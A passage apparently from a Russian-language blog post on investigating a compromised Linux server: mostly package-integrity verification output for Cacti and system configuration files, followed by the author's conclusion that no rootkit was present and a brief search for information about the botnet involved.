\/usr\/share\/cacti\/images\/button_clear.gif .M.......    \/usr\/share\/cacti\/images\/button_colapse_all.gif .M.......    \/usr\/share\/cacti\/images\/button_create.gif .M.......    \/usr\/share\/cacti\/images\/button_default.gif .M.......    \/usr\/share\/cacti\/images\/button_delete.gif .M.......    \/usr\/share\/cacti\/images\/button_expand_all.gif .M.......    \/usr\/share\/cacti\/images\/button_export.gif .M.......    \/usr\/share\/cacti\/images\/button_go.gif .M.......    \/usr\/share\/cacti\/images\/button_help.gif .M.......    \/usr\/share\/cacti\/images\/button_import.gif .M.......    \/usr\/share\/cacti\/images\/button_no.gif .M.......    \/usr\/share\/cacti\/images\/button_purge.gif .M.......    \/usr\/share\/cacti\/images\/button_refresh.gif .M.......    \/usr\/share\/cacti\/images\/button_save.gif .M.......    \/usr\/share\/cacti\/images\/button_view.gif .M.......    \/usr\/share\/cacti\/images\/button_yes.gif .M.......    \/usr\/share\/cacti\/images\/cacti_about_logo.gif .M.......    \/usr\/share\/cacti\/images\/cacti_backdrop.gif .M.......    \/usr\/share\/cacti\/images\/cacti_backdrop2.gif .M.......    \/usr\/share\/cacti\/images\/cacti_logo.gif .M.......    \/usr\/share\/cacti\/images\/calendar.gif .M.......    \/usr\/share\/cacti\/images\/delete_icon.gif .M.......    \/usr\/share\/cacti\/images\/delete_icon_large.gif .M.......    \/usr\/share\/cacti\/images\/disable_icon.png .M.......    \/usr\/share\/cacti\/images\/enable_icon.png .M.......    \/usr\/share\/cacti\/images\/enable_icon_disabled.png .M.......    \/usr\/share\/cacti\/images\/favicon.ico .M.......    \/usr\/share\/cacti\/images\/graph_page_top.gif .M.......    \/usr\/share\/cacti\/images\/graph_properties.gif .M.......    \/usr\/share\/cacti\/images\/graph_query.png .M.......    \/usr\/share\/cacti\/images\/graph_zoom.gif .M.......    \/usr\/share\/cacti\/images\/hide.gif .M.......    \/usr\/share\/cacti\/images\/install_icon.png .M.......    \/usr\/share\/cacti\/images\/install_icon_disabled.png .M.......    \/usr\/share\/cacti\/images\/left_border.gif .M.......    \/usr\/share\/cacti\/images\/menu_line.gif .M.......    \/usr\/share\/cacti\/images\/menuarrow.gif .M.......    \/usr\/share\/cacti\/images\/move_down.gif .M.......    \/usr\/share\/cacti\/images\/move_left.gif .M.......    \/usr\/share\/cacti\/images\/move_right.gif .M.......    \/usr\/share\/cacti\/images\/move_up.gif .M.......    \/usr\/share\/cacti\/images\/reload_icon_small.gif .M.......    \/usr\/share\/cacti\/images\/shadow.gif .M.......    \/usr\/share\/cacti\/images\/shadow_gray.gif .M.......    \/usr\/share\/cacti\/images\/show.gif .M.......    \/usr\/share\/cacti\/images\/tab_cacti.gif .M.......    \/usr\/share\/cacti\/images\/tab_console.gif .M.......    \/usr\/share\/cacti\/images\/tab_console_down.gif .M.......    \/usr\/share\/cacti\/images\/tab_graphs.gif .M.......    \/usr\/share\/cacti\/images\/tab_graphs_down.gif .M.......    \/usr\/share\/cacti\/images\/tab_mode_list.gif .M.......    \/usr\/share\/cacti\/images\/tab_mode_list_down.gif .M.......    \/usr\/share\/cacti\/images\/tab_mode_preview.gif .M.......    \/usr\/share\/cacti\/images\/tab_mode_preview_down.gif .M.......    \/usr\/share\/cacti\/images\/tab_mode_tree.gif .M.......    \/usr\/share\/cacti\/images\/tab_mode_tree_down.gif .M.......    \/usr\/share\/cacti\/images\/tab_settings.gif .M.......    \/usr\/share\/cacti\/images\/tab_settings_down.gif .M.......    \/usr\/share\/cacti\/images\/transparent_line.gif .M.......    \/usr\/share\/cacti\/images\/uninstall_icon.gif .M.......    \/usr\/share\/cacti\/images\/view_none.gif .M.......    \/usr\/share\/cacti\/include .M.......    \/usr\/share\/cacti\/include\/auth.php .M.......    \/usr\/share\/cacti\/include\/bottom_footer.php .M.......    \/usr\/share\/cacti\/include\/global.php .M.......    \/usr\/share\/cacti\/include\/global_arrays.php .M.......    \/usr\/share\/cacti\/include\/global_constants.php .M.......    \/usr\/share\/cacti\/include\/global_form.php .M.......    \/usr\/share\/cacti\/include\/global_settings.php .M.......    \/usr\/share\/cacti\/include\/jscalendar .M.......    \/usr\/share\/cacti\/include\/jscalendar\/calendar-setup.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/calendar.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-af.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-al.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-bg.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-big5-utf8.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-big5.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-br.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-ca.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-cs-utf8.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-cs-win.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-da.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-de.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-du.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-el.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-en.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-es.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-fi.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-fr.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-he-utf8.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-hr-utf8.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-hr.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-hu.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-it.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-jp.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-ko-utf8.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-ko.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-lt-utf8.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-lt.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-lv.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-nl.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-no.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-pl-utf8.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-pl.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-pt.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-ro.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-ru.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-ru_win_.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-si.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-sk.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-sp.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-sv.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-tr.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/calendar-zh.js .M.......    \/usr\/share\/cacti\/include\/jscalendar\/lang\/cn_utf8.js .M.......    \/usr\/share\/cacti\/include\/layout.js .M.......    \/usr\/share\/cacti\/include\/main.css .M.......    \/usr\/share\/cacti\/include\/plugins.php .M.......    \/usr\/share\/cacti\/include\/top_graph_header.php .M.......    \/usr\/share\/cacti\/include\/top_header.php .M.......    \/usr\/share\/cacti\/include\/treeview .M.......    \/usr\/share\/cacti\/include\/treeview\/ftiens4.js .M.......    \/usr\/share\/cacti\/include\/treeview\/ftiens4_export.js .M.......    \/usr\/share\/cacti\/include\/treeview\/ftv2blank.gif .M.......    \/usr\/share\/cacti\/include\/treeview\/ftv2lastnode.gif .M.......    \/usr\/share\/cacti\/include\/treeview\/ftv2mlastnode.gif .M.......    \/usr\/share\/cacti\/include\/treeview\/ftv2mnode.gif .M.......    \/usr\/share\/cacti\/include\/treeview\/ftv2node.gif .M.......    \/usr\/share\/cacti\/include\/treeview\/ftv2plastnode.gif .M.......    \/usr\/share\/cacti\/include\/treeview\/ftv2pnode.gif .M.......    \/usr\/share\/cacti\/include\/treeview\/ftv2vertline.gif .M.......    \/usr\/share\/cacti\/include\/treeview\/ua.js .M.......    \/usr\/share\/cacti\/include\/zoom.js .M.......    \/usr\/share\/cacti\/index.php .M.......    \/usr\/share\/cacti\/install .M.......    \/usr\/share\/cacti\/install\/0_8_1_to_0_8_2.php .M.......    \/usr\/share\/cacti\/install\/0_8_2_to_0_8_2a.php .M.......    \/usr\/share\/cacti\/install\/0_8_2a_to_0_8_3.php .M.......    \/usr\/share\/cacti\/install\/0_8_3_to_0_8_4.php .M.......    \/usr\/share\/cacti\/install\/0_8_4_to_0_8_5.php .M.......    \/usr\/share\/cacti\/install\/0_8_5a_to_0_8_6.php .M.......    \/usr\/share\/cacti\/install\/0_8_6_to_0_8_6a.php .M.......    \/usr\/share\/cacti\/install\/0_8_6c_to_0_8_6d.php .M.......    \/usr\/share\/cacti\/install\/0_8_6d_to_0_8_6e.php .M.......    \/usr\/share\/cacti\/install\/0_8_6f_to_0_8_6g.php .M.......    \/usr\/share\/cacti\/install\/0_8_6g_to_0_8_6h.php .M.......    \/usr\/share\/cacti\/install\/0_8_6h_to_0_8_6i.php .M.......    \/usr\/share\/cacti\/install\/0_8_6j_to_0_8_7.php .M.......    \/usr\/share\/cacti\/install\/0_8_7_to_0_8_7a.php .M.......    \/usr\/share\/cacti\/install\/0_8_7a_to_0_8_7b.php .M.......    \/usr\/share\/cacti\/install\/0_8_7b_to_0_8_7c.php .M.......    \/usr\/share\/cacti\/install\/0_8_7c_to_0_8_7d.php .M.......    \/usr\/share\/cacti\/install\/0_8_7d_to_0_8_7e.php .M.......    \/usr\/share\/cacti\/install\/0_8_7e_to_0_8_7f.php .M.......    \/usr\/share\/cacti\/install\/0_8_7f_to_0_8_7g.php .M.......    \/usr\/share\/cacti\/install\/0_8_7g_to_0_8_7h.php .M.......    \/usr\/share\/cacti\/install\/0_8_7h_to_0_8_7i.php .M.......    \/usr\/share\/cacti\/install\/0_8_7i_to_0_8_8.php .M.......    \/usr\/share\/cacti\/install\/0_8_8_to_0_8_8a.php .M.......    \/usr\/share\/cacti\/install\/0_8_to_0_8_1.php .M.......    \/usr\/share\/cacti\/install\/index.php .M.......    \/usr\/share\/cacti\/install\/install_finish.gif .M.......    \/usr\/share\/cacti\/install\/install_next.gif .M.......    \/usr\/share\/cacti\/lib .M.......    \/usr\/share\/cacti\/lib\/adodb .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-csvlib.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-datadict.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-error.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-errorhandler.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-errorpear.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-exceptions.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-iterator.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-lib.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-pear.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-perf.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-php4.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-time.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb-xmlschema.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/adodb.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-access.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-db2.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-firebird.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-generic.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-ibase.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-informix.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-mssql.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-mysql.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-oci8.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-postgres.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-sapdb.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/datadict\/datadict-sybase.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-access.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-ado.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-ado5.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-ado_access.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-ado_mssql.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-borland_ibase.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-csv.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-db2.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-fbsql.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-firebird.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-ibase.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-informix.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-informix72.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-ldap.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-mssql.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-mssqlpo.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-mysql.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-mysqli.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-mysqlt.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-netezza.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-oci8.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-oci805.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-oci8po.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-odbc.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-odbc_mssql.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-odbc_oracle.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-odbtp.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-odbtp_unicode.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-oracle.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-pdo.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-postgres.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-postgres64.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-postgres7.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-proxy.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-sapdb.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-sqlanywhere.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-sqlite.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-sqlitepo.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-sybase.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/drivers\/adodb-vfp.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-ar.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-bg.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-bgutf8.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-ca.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-cn.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-cz.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-de.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-en.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-es.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-fr.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-hu.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-it.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-nl.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-pl.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-pt-br.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-ro.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-ru1251.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/lang\/adodb-sv.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/license.txt .M.......    \/usr\/share\/cacti\/lib\/adodb\/toexport.inc.php .M.......    \/usr\/share\/cacti\/lib\/adodb\/tohtml.inc.php .M.......    \/usr\/share\/cacti\/lib\/api_automation_tools.php .M.......    \/usr\/share\/cacti\/lib\/api_data_source.php .M.......    \/usr\/share\/cacti\/lib\/api_device.php .M.......    \/usr\/share\/cacti\/lib\/api_graph.php .M.......    \/usr\/share\/cacti\/lib\/api_poller.php .M.......    \/usr\/share\/cacti\/lib\/api_tree.php .M.......    \/usr\/share\/cacti\/lib\/auth.php .M.......    \/usr\/share\/cacti\/lib\/cdef.php .M.......    \/usr\/share\/cacti\/lib\/data_query.php .M.......    \/usr\/share\/cacti\/lib\/database.php .M.......    \/usr\/share\/cacti\/lib\/export.php .M.......    \/usr\/share\/cacti\/lib\/functions.php .M.......    \/usr\/share\/cacti\/lib\/graph_export.php .M.......    \/usr\/share\/cacti\/lib\/graph_variables.php .M.......    \/usr\/share\/cacti\/lib\/html.php .M.......    \/usr\/share\/cacti\/lib\/html_form.php .M.......    \/usr\/share\/cacti\/lib\/html_form_template.php .M.......    \/usr\/share\/cacti\/lib\/html_tree.php .M.......    \/usr\/share\/cacti\/lib\/html_utility.php .M.......    \/usr\/share\/cacti\/lib\/html_validate.php .M.......    \/usr\/share\/cacti\/lib\/import.php .M.......    \/usr\/share\/cacti\/lib\/ldap.php .M.......    \/usr\/share\/cacti\/lib\/ping.php .M.......    \/usr\/share\/cacti\/lib\/plugins.php .M.......    \/usr\/share\/cacti\/lib\/poller.php .M.......    \/usr\/share\/cacti\/lib\/rrd.php .M.......    \/usr\/share\/cacti\/lib\/snmp.php .M.......    \/usr\/share\/cacti\/lib\/sort.php .M.......    \/usr\/share\/cacti\/lib\/template.php .M.......    \/usr\/share\/cacti\/lib\/time.php .M.......    \/usr\/share\/cacti\/lib\/timespan_settings.php .M.......    \/usr\/share\/cacti\/lib\/tree.php .M.......    \/usr\/share\/cacti\/lib\/utility.php .M.......    \/usr\/share\/cacti\/lib\/variables.php .M.......    \/usr\/share\/cacti\/lib\/xml.php .M.......    \/usr\/share\/cacti\/logout.php .M.......    \/usr\/share\/cacti\/plugins .M.......    \/usr\/share\/cacti\/plugins.php .M.......    \/usr\/share\/cacti\/plugins\/index.php .M.......    \/usr\/share\/cacti\/poller.php .M.......    \/usr\/share\/cacti\/poller_commands.php .M.......    \/usr\/share\/cacti\/poller_export.php .M.......    \/usr\/share\/cacti\/resource .M.......    \/usr\/share\/cacti\/resource\/script_queries .M.......    \/usr\/share\/cacti\/resource\/script_queries\/host_cpu.xml .M.......    \/usr\/share\/cacti\/resource\/script_queries\/host_disk.xml .M.......    \/usr\/share\/cacti\/resource\/script_queries\/unix_disk.xml .M.......    \/usr\/share\/cacti\/resource\/script_server .M.......    \/usr\/share\/cacti\/resource\/script_server\/host_cpu.xml .M.......    \/usr\/share\/cacti\/resource\/script_server\/host_disk.xml .M.......    \/usr\/share\/cacti\/resource\/snmp_queries .M.......    \/usr\/share\/cacti\/resource\/snmp_queries\/host_disk.xml .M.......    \/usr\/share\/cacti\/resource\/snmp_queries\/interface.xml .M.......    \/usr\/share\/cacti\/resource\/snmp_queries\/kbridge.xml .M.......    \/usr\/share\/cacti\/resource\/snmp_queries\/net-snmp_disk.xml .M.......    \/usr\/share\/cacti\/resource\/snmp_queries\/netware_cpu.xml .M.......    \/usr\/share\/cacti\/resource\/snmp_queries\/netware_disk.xml .M.......    \/usr\/share\/cacti\/rra.php .M.......    \/usr\/share\/cacti\/script_server.php .M.......    \/usr\/share\/cacti\/settings.php .M.......    \/usr\/share\/cacti\/templates_export.php .M.......    \/usr\/share\/cacti\/templates_import.php .M.......    \/usr\/share\/cacti\/tree.php .M.......    \/usr\/share\/cacti\/user_admin.php .M.......    \/usr\/share\/cacti\/utilities.php .M.......    \/var\/lib\/cacti .M.......    \/var\/lib\/cacti\/cli .M.......    \/var\/lib\/cacti\/cli\/add_data_query.php .M.......    \/var\/lib\/cacti\/cli\/add_device.php .M.......    \/var\/lib\/cacti\/cli\/add_graph_template.php .M.......    \/var\/lib\/cacti\/cli\/add_graphs.php .M.......    \/var\/lib\/cacti\/cli\/add_perms.php .M.......    \/var\/lib\/cacti\/cli\/add_tree.php .M.......    \/var\/lib\/cacti\/cli\/analyze_database.php .M.......    \/var\/lib\/cacti\/cli\/convert_innodb.php .M.......    \/var\/lib\/cacti\/cli\/copy_user.php .M.......    \/var\/lib\/cacti\/cli\/data_template_associate_rra.php .M.......    \/var\/lib\/cacti\/cli\/host_update_template.php .M.......    \/var\/lib\/cacti\/cli\/import_template.php .M.......    \/var\/lib\/cacti\/cli\/poller_data_sources_reapply_names.php .M.......    \/var\/lib\/cacti\/cli\/poller_graphs_reapply_names.php .M.......    \/var\/lib\/cacti\/cli\/poller_output_empty.php .M.......    \/var\/lib\/cacti\/cli\/poller_reindex_hosts.php .M.......    \/var\/lib\/cacti\/cli\/rebuild_poller_cache.php .M.......    \/var\/lib\/cacti\/cli\/reorder_data_query.php .M.......    \/var\/lib\/cacti\/cli\/repair_database.php .M.......    \/var\/lib\/cacti\/cli\/repair_templates.php .M.......    \/var\/lib\/cacti\/cli\/structure_rra_paths.php .M.......    \/var\/lib\/cacti\/cli\/upgrade_database.php .M.......    \/var\/lib\/cacti\/rra .M.......    \/var\/lib\/cacti\/scripts .M.......    \/var\/lib\/cacti\/scripts\/3com_cable_modem.pl .M.......    \/var\/lib\/cacti\/scripts\/diskfree.pl .M.......    \/var\/lib\/cacti\/scripts\/diskfree.sh .M.......    \/var\/lib\/cacti\/scripts\/linux_memory.pl .M.......    \/var\/lib\/cacti\/scripts\/loadavg.pl .M.......    \/var\/lib\/cacti\/scripts\/loadavg_multi.pl .M.......    \/var\/lib\/cacti\/scripts\/ping.pl .M.......    \/var\/lib\/cacti\/scripts\/query_host_cpu.php .M.......    \/var\/lib\/cacti\/scripts\/query_host_partitions.php .M.......    \/var\/lib\/cacti\/scripts\/query_unix_partitions.pl .M.......    \/var\/lib\/cacti\/scripts\/sql.php .M.......    \/var\/lib\/cacti\/scripts\/ss_fping.php .M.......    \/var\/lib\/cacti\/scripts\/ss_host_cpu.php .M.......    \/var\/lib\/cacti\/scripts\/ss_host_disk.php .M.......    \/var\/lib\/cacti\/scripts\/ss_sql.php .M.......    \/var\/lib\/cacti\/scripts\/unix_processes.pl .M.......    \/var\/lib\/cacti\/scripts\/unix_tcp_connections.pl .M.......    \/var\/lib\/cacti\/scripts\/unix_users.pl .M.......    \/var\/lib\/cacti\/scripts\/weatherbug.pl .M.......    \/var\/lib\/cacti\/scripts\/webhits.pl S.5....T.    \/var\/log\/cacti\/cacti.log S.5....T.  c \/etc\/ntop.conf .......T.  c \/etc\/avahi\/hosts S.5....T.  c \/etc\/netatalk\/AppleVolumes.default S.5....T.  c \/etc\/netatalk\/afpd.conf S.5....T.  c \/etc\/netatalk\/netatalk.conf S.5....T.  c \/etc\/httpd\/conf.d\/nagios.conf S.5....T.  c \/etc\/nagios\/nagios.cfg S.5....T.  c \/etc\/nagios\/objects\/commands.cfg S.5....T.  c \/etc\/nagios\/objects\/localhost.cfg S.5....T.  c \/etc\/sysconfig\/ntpd S.5....T.  c \/etc\/profile SM5..UGT.  c \/etc\/snmp\/snmpd.conf S.5....T.  c \/etc\/sysconfig\/iptables-config .......T.  c \/etc\/avahi\/avahi-dnsconfd.action S.5....T.  c \/etc\/dnsmasq.conf<\/code><\/pre>\n<\/div>\n<\/div>\n
  \u042d\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u043d\u0438\u043a\u0430\u043a\u0438\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u043d\u0435 \u0431\u044b\u043b\u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u044b. \u0422.\u043a. \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043d\u0435 \u0431\u044b\u043b\u0438 \u0441\u043a\u0440\u044b\u0442\u044b, \u044f \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u043b, \u0447\u0442\u043e \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0440\u0443\u0442\u043a\u0438\u0442\u043e\u0432 \u0437\u0434\u0435\u0441\u044c \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u043e\u0441\u044c \u0438 \u043c\u043e\u0436\u043d\u043e \u0441 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0443\u0432\u0435\u0440\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u044e \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0447\u0438\u0441\u0442\u0430.<\/p>\n
\u041f\u043e\u0438\u0441\u043a \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u0431\u043e\u0442\u043d\u0435\u0442\u0435<\/h4>\n
  \u041f\u0435\u0440\u0432\u044b\u043c \u0434\u0435\u043b\u043e\u043c \u044f \u043d\u0430\u0447\u0430\u043b \u0438\u0441\u043a\u0430\u0442\u044c \u043a\u0430\u043a\u0443\u044e-\u0442\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u044d\u0442\u043e\u043c \u0431\u043e\u0442\u043d\u0435\u0442\u0435, \u0438\u0449\u0430 \u043f\u043e \u0438\u043c\u0435\u043d\u0438 \u0434\u043e\u043c\u0435\u043d\u0430, \u0438\u043c\u0435\u043d\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0441\u0442\u0440\u043e\u043a\u0430\u043c \u0438\u0437 crontab.
  \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u043d\u0430\u0448\u043b\u0430\u0441\u044c:
  My home PC has been 0wn3d \ud83d\ude41<\/a> @ forums.debian.net
  What do sapd, skysapd, sksapd, and ksapd do?<\/a> @ askubuntu.com
  I Got Myself Hacked<\/a> @ hackervisions.org
  Suspected rootkit<\/a> @ archlinuxarm.org<\/p>\n
  \u0412 \u0446\u0435\u043b\u043e\u043c, \u043d\u0438\u0447\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u0438\u043b\u0438 \u043d\u043e\u0432\u043e\u0433\u043e.<\/p>\n
